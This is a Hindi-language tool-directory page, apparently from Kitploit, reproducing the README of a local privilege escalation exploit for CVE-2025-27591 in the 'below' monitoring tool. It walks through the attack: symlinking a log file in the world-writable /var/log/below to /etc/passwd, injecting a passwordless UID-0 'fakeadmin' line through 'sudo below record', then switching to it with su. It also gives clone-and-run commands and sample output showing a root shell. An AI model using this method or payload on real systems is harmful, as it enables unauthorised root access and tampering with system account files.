Skip to content
KitploitKITPLOIT
उपकरणएक्सप्लॉइटब्लॉग
Log in
जमा करें
उपकरणएक्सप्लॉइटब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2025-27591 — 🔥 स्थानीय विशेषाधिकार वृद्धि एक्सप्लॉइट CVE-2025-27591 के लिए | Below में विश्व-लेखनीय लॉग निर्देशिका का दुरुपयोग करके /etc/passwd इंजेक्शन के माध्यम से रूट प्राप्त करता है | Kitploit
उपकरण/GitHubGitHub/00xcanelo/cve-2025-27591
विशेषाधिकार वृद्धिभेद्यता विश्लेषणशोषणपेनिट्रेशन टेस्टिंगलर्निंग और शिक्षाबाइनरी शोषण
GitHub00xcanelo/cve-2025-27591

CVE-2025-27591

🔥 स्थानीय विशेषाधिकार वृद्धि एक्सप्लॉइट CVE-2025-27591 के लिए | Below में विश्व-लेखनीय लॉग निर्देशिका का दुरुपयोग करके /etc/passwd इंजेक्शन के माध्यम से रूट प्राप्त करता है

रिपॉजिटरी देखें
2651 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2025-27591 – below में सिमलिंक दुरुपयोग के माध्यम से विशेषाधिकार वृद्धि

Author CVE

🛑 अस्वीकरण: यह एक्सप्लॉइट केवल शैक्षिक और अधिकृत सुरक्षा परीक्षण के लिए प्रदान किया गया है। अनधिकृत उपयोग अवैध हो सकता है।


🧠 अवलोकन

below Facebook द्वारा लिनक्स सिस्टम के लिए विकसित एक प्रदर्शन निगरानी टूल है। पैच किए गए रिलीज़ से पहले के below संस्करण एक गंभीर कमजोरी से प्रभावित हैं जो अन-प्रिविलेज्ड उपयोगकर्ताओं को विश्व-लेखन योग्य लॉग निर्देशिकाओं और असुरक्षित लॉग हैंडलिंग का शोषण करके रूट तक पहुँचने की अनुमति देता है।


🔎 CVE विवरण

फ़ील्डमान
CVE-IDCVE-2025-27591
गंभीरता🔥 गंभीर (CVSS ≈ 7.8 - 8.8)
हमला वेक्टरस्थानीय
प्रभावरूट (UID=0) तक विशेषाधिकार वृद्धि
एक्सप्लॉइट प्रकारसिमलिंक दुरुपयोग / लॉग फ़ाइल इंजेक्शन
प्रभावित ऐपbelow – सामान्यतः /usr/bin/below के रूप में स्थापित
मूल कारणअनुमति जाँच के बिना /var/log/below/ में असुरक्षित फ़ाइल लेखन

💥 एक्सप्लॉइट लॉजिक

यह Bash स्क्रिप्ट निम्नलिखित कार्य करती है:

  1. विश्व-लेखन योग्य निर्देशिका की जाँच:

    • पुष्टि करती है कि /var/log/below विश्व-लेखन योग्य है (एक लाल झंडा)।
  2. सिमलिंक हमले की तैयारी:

    • मौजूदा error_root.log (यदि कोई हो) को हटाती है और /etc/passwd के लिए एक प्रतीकात्मक लिंक बनाती है।
  3. पेलोड निर्माण:

    • /etc/passwd में एक नकली रूट उपयोगकर्ता जोड़ती है:
      fakeadmin::0:0:fakeadmin:/root:/bin/bash
      
  4. लॉगिंग ट्रिगर:

    • sudo below record चलाकर कमजोर बाइनरी को लॉग लिखने के लिए बाध्य करती है।
  5. रूट एक्सेस प्राप्त करना:

    • बिना पासवर्ड प्रॉम्प्ट के रूट शेल प्राप्त करने के लिए su fakeadmin का उपयोग करती है।

📁 निर्देशिका संरचना

CVE-2025-27591/
├── exploit.sh
├── README.md

✅ आवश्यक शर्तें

एक्सप्लॉइट चलाने से पहले, सुनिश्चित करें कि आपके पास निम्नलिखित हैं:

  • Bash शेल (लिनक्स सिस्टम)
  • कमजोर बाइनरी स्थापित: /usr/bin/below
  • विश्व-लेखन योग्य लॉग निर्देशिका: /var/log/below
  • निष्पादित करने के लिए sudo विशेषाधिकार: sudo below record
  • उपलब्ध उपकरण:
    • ln (सिमलिंक बनाने के लिए)
    • su (उपयोगकर्ता बदलने के लिए)
    • timeout (निष्पादन समय को नियंत्रित करने के लिए)
    • whoami (विशेषाधिकार जाँच के लिए)

🚀 एक्सप्लॉइटेशन चरण

# 1. रिपॉजिटरी क्लोन करें
git clone https://github.com/00xCanelo/CVE-2025-27591.git
cd CVE-2025-27591

# 2. स्क्रिप्ट को निष्पादन योग्य बनाएं
chmod +x exploit.sh

# 3. एक्सप्लॉइट चलाएं
./exploit.sh

🧪 नमूना आउटपुट

[*] CVE-2025-27591 कमजोरी की जाँच की जा रही है...
[+] /var/log/below विश्व-लेखन योग्य है।
[!] मौजूदा लॉग फ़ाइल मिली: उसे हटाया जा रहा है...
[+] सिमलिंक बनाया गया: /var/log/below/error_root.log -> /etc/passwd

[*] /tmp/fakeadmin में दुर्भावनापूर्ण पंक्ति लिखी जा रही है
[*] 'sudo below record' के माध्यम से लॉगिंग ट्रिगर की जा रही है...
[+] 'below record' निष्पादित (या टाइमआउट) हुआ

[*] सिमलिंक के माध्यम से पेलोड को /etc/passwd में लिखने का प्रयास...
[+] पेलोड सफलतापूर्वक जोड़ा गया।

[*] 'su fakeadmin' का उपयोग करके रूट शेल में स्विच करने का प्रयास...
root@target:/# whoami
root
टूल डाउनलोड करें